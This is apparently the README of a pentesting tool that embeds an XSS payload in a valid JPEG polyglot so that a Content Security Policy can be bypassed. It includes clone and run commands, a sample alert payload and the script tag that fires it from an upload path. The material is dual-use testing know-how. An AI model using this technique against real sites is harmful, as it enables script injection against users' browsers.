A tool inspired by: https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs
This tool automates the proces of generating a polyglot JPG image and XSS payload. The resulting file is a working JPG image which should be validated as valid by any file parser. The containing XSS payload can still be fired by a specially crafted XSS injection. This is usefull if you have limited space to insert your payload and are blocked by the Content Security Policy to load external resources.
To use the tool follow the following proces:
git clone https://github.com/YouGina/JPGPolyglotGenerate.git
Download or make a normal JPG file, say input.jpg
xxd img.jpg | grep "2a2f"
If the comment above does not return any output, continue, otherwise choose another image
Execute the following command to insert the payload into the image:
nodejs jpg-polyglot-generate.js input.jpg output.jpg 'alert("Payload");'
To insert a payload from a file, you can also do:
nodejs jpg-polyglot-generate.js input.jpg output.jpg "$(cat file.js | sed 's/\n//g')"
<script charset="ISO-8859-1" src="/upload-path/output.jpg"></script>
The image should still work as an image too:
<img src="/upload-path/output.jpg" />